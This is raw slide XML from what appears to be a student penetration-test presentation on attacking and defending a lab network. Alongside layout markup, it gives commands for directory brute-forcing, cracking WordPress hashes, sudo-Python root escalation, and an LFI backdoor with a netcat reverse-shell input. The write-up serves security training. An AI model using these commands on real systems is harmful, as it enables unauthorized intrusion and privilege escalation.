          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1526" name="Google Shape;1526;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27" name="Google Shape;1527;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28" name="Google Shape;1528;p101"/>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29" name="Google Shape;1529;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1530" name="Google Shape;1530;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31" name="Google Shape;1531;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2" name="Google Shape;1532;p101"/>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3" name="Google Shape;1533;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1534" name="Google Shape;1534;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35" name="Google Shape;1535;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6" name="Google Shape;1536;p101"/>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7" name="Google Shape;1537;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1538" name="Google Shape;1538;p101"/>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39" name="Google Shape;1539;p101"/>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0" name="Google Shape;1540;p101"/>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1" name="Google Shape;1541;p101"/>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2" name="Google Shape;1542;p101"/>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3" name="Google Shape;1543;p101"/>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4" name="Google Shape;1544;p101"/>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545"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1546" name="Google Shape;1546;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47" name="Google Shape;1547;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8" name="Google Shape;1548;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49" name="Google Shape;1549;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50" name="Google Shape;1550;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1" name="Google Shape;1551;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52" name="Google Shape;1552;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53" name="Google Shape;1553;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1554" name="Google Shape;1554;p102"/>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55" name="Google Shape;1555;p102"/>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6" name="Google Shape;1556;p102"/>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7" name="Google Shape;1557;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58" name="Google Shape;1558;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1559" name="Google Shape;1559;p102"/>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60" name="Google Shape;1560;p102"/>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1" name="Google Shape;1561;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2" name="Google Shape;1562;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1563" name="Google Shape;1563;p102"/>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64" name="Google Shape;1564;p102"/>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5" name="Google Shape;1565;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6" name="Google Shape;1566;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1567" name="Google Shape;1567;p102"/>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68" name="Google Shape;1568;p102"/>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9" name="Google Shape;1569;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0" name="Google Shape;1570;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1571" name="Google Shape;1571;p102"/>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72" name="Google Shape;1572;p102"/>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3" name="Google Shape;1573;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4" name="Google Shape;1574;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1575" name="Google Shape;1575;p102"/>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76" name="Google Shape;1576;p102"/>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7" name="Google Shape;1577;p102"/>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8" name="Google Shape;1578;p102"/>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79" name="Google Shape;1579;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0" name="Google Shape;1580;p102"/>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1" name="Google Shape;1581;p102"/>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582"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1583" name="Google Shape;1583;p103"/>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84" name="Google Shape;1584;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5" name="Google Shape;1585;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86" name="Google Shape;1586;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87" name="Google Shape;1587;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88" name="Google Shape;1588;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89" name="Google Shape;1589;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90" name="Google Shape;1590;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="3066140"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1591" name="Google Shape;159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592" name="Google Shape;159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3" name="Google Shape;1593;p103"/>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4" name="Google Shape;1594;p103"/>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95" name="Google Shape;1595;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="4459807"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1596" name="Google Shape;159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597" name="Google Shape;159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98" name="Google Shape;1598;p103"/>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9" name="Google Shape;1599;p103"/>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0" name="Google Shape;1600;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="5854874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1601" name="Google Shape;160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02" name="Google Shape;160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3" name="Google Shape;1603;p103"/>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4" name="Google Shape;1604;p103"/>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5" name="Google Shape;1605;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="7248540"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1606" name="Google Shape;160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07" name="Google Shape;160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8" name="Google Shape;1608;p103"/>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9" name="Google Shape;1609;p103"/>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0" name="Google Shape;1610;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="8642207"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1611" name="Google Shape;161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12" name="Google Shape;161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3" name="Google Shape;1613;p103"/>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4" name="Google Shape;1614;p103"/>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5" name="Google Shape;1615;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="10035874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1616" name="Google Shape;1616;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17" name="Google Shape;1617;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8" name="Google Shape;1618;p103"/>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9" name="Google Shape;1619;p103"/>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0" name="Google Shape;1620;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="11497607"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1621" name="Google Shape;1621;p10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22" name="Google Shape;1622;p10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3" name="Google Shape;1623;p103"/>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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout129.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout81.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theme" Target="../theme/theme4.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82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p80"/>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 id="2147483759" r:id="rId36"/>
    <p:sldLayoutId id="2147483760" r:id="rId37"/>
    <p:sldLayoutId id="2147483761" r:id="rId38"/>
    <p:sldLayoutId id="2147483762" r:id="rId39"/>
    <p:sldLayoutId id="2147483763" r:id="rId40"/>
    <p:sldLayoutId id="2147483764" r:id="rId41"/>
    <p:sldLayoutId id="2147483765" r:id="rId42"/>
    <p:sldLayoutId id="2147483766" r:id="rId43"/>
    <p:sldLayoutId id="2147483767" r:id="rId44"/>
    <p:sldLayoutId id="2147483768" r:id="rId45"/>
    <p:sldLayoutId id="2147483769" r:id="rId46"/>
    <p:sldLayoutId id="2147483770" r:id="rId47"/>
    <p:sldLayoutId id="2147483771" r:id="rId48"/>
    <p:sldLayoutId id="2147483772" r:id="rId49"/>
    <p:sldLayoutId id="2147483773" r:id="rId50"/>
    <p:sldLayoutId id="2147483774" r:id="rId51"/>
    <p:sldLayoutId id="2147483775" r:id="rId52"/>
    <p:sldLayoutId id="2147483776" r:id="rId53"/>
    <p:sldLayoutId id="2147483777" r:id="rId54"/>
    <p:sldLayoutId id="2147483778" r:id="rId55"/>
    <p:sldLayoutId id="2147483779"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85.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85.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85.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85.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85.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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2335" name="Google Shape;2335;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5134906" y="9397720"/>
            <a:ext cx="16418100" cy="2112900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6800" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Dharani,Junior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6800" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6800" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Stanley,Waleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6800" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> ,Conrad</a:t>
            </a:r>
            <a:endParaRPr sz="6800" i="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2336" name="Google Shape;2336;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37" name="Google Shape;2337;p137"/>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8" name="Google Shape;2338;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883777" y="52132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dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Final Engagement</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Attack, Defense &amp; Analysis of a Vulnerable Network</a:t>
            </a:r>
            <a:endParaRPr sz="6800"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1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Directory Exploration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13" name="Google Shape;2413;p1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414" name="Google Shape;2414;p146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872709" y="1719667"/>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a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-438150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u http://192.168.1.115/ -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/directory-list-2.3-medium.txt</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1"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 </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Achieved list of interesting and possibly exploitable directories.</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="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678C87D4-92F4-421B-B11F-083092EA31E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2749549" y="5812895"/>
            <a:ext cx="10993151" cy="71919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Unprotected and Unsalted Hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2421" name="Google Shape;2421;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22" name="Google Shape;2422;p14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Used JohnTheRipper to brute force the hash located within the MySQL database.</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john --wordlist /usr/share/wordlists/rockyou.txt wp_hashes.txt</a:t>
            </a:r>
            <a:endParaRPr sz="40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sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gained the ability to ssh from Michael to Steven to gain further privileges</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2423" name="Google Shape;2423;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="8190875"/>
            <a:ext cx="13366575" cy="2126500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2424" name="Google Shape;2424;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="10473900"/>
            <a:ext cx="8871275" cy="1876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Privilege Escalation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30" name="Google Shape;2430;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31" name="Google Shape;2431;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Used sudo -l to gain information needed to perform escalation</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Used sudo Python access to escalate to root</a:t>
            </a:r>
            <a:endParaRPr sz="400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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo python -c 'import pty; pty.spawn("bin/bash")' </a:t>
            </a:r>
            <a:endParaRPr sz="36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Achieved root access on the machine</a:t>
            </a:r>
            <a:endParaRPr sz="40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432" name="Google Shape;2432;p148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="8403225"/>
            <a:ext cx="15761975" cy="1843950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2433" name="Google Shape;2433;p148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="10367725"/>
            <a:ext cx="11349000" cy="103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1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Local File Inclusion (LFI)</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39" name="Google Shape;2439;p1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40" name="Google Shape;2440;p1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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr sz="44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Utilized the exploit.sh script to insert a backdoor php file into the vulnerable web server</a:t>
            </a:r>
            <a:endParaRPr sz="400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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input ‘cmd=nc%20192.168.1.115%204444%20-e%20/bin/bash’ to execute bash terminal</a:t>
            </a:r>
            <a:endParaRPr sz="40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sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Achieved a tunnel to the Target 2 machine</a:t>
            </a:r>
            <a:endParaRPr sz="4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Exploitation: Local File Inclusion (LFI) {Support Info}</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446" name="Google Shape;2446;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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2514065E-5D55-42C5-86E7-99AE29CCBE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5380028"/>
            <a:ext cx="12514116" cy="7512916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99670984-19C2-4091-9E2F-D6A25B53226C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12514115" y="5380028"/>
            <a:ext cx="11863535" cy="7512916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8601DD51-1E90-4D87-952B-3229BF9C0F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1936464"/>
            <a:ext cx="23078504" cy="328043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pic>
        <p:nvPicPr>
          <p:cNvPr id="2485" name="Google Shape;2485;p15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86" name="Google Shape;2486;p15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15</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2487" name="Google Shape;2487;p155"/>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Maintaining Access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488" name="Google Shape;2488;p155"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2493" name="Google Shape;2493;p15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Backdooring the Target</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
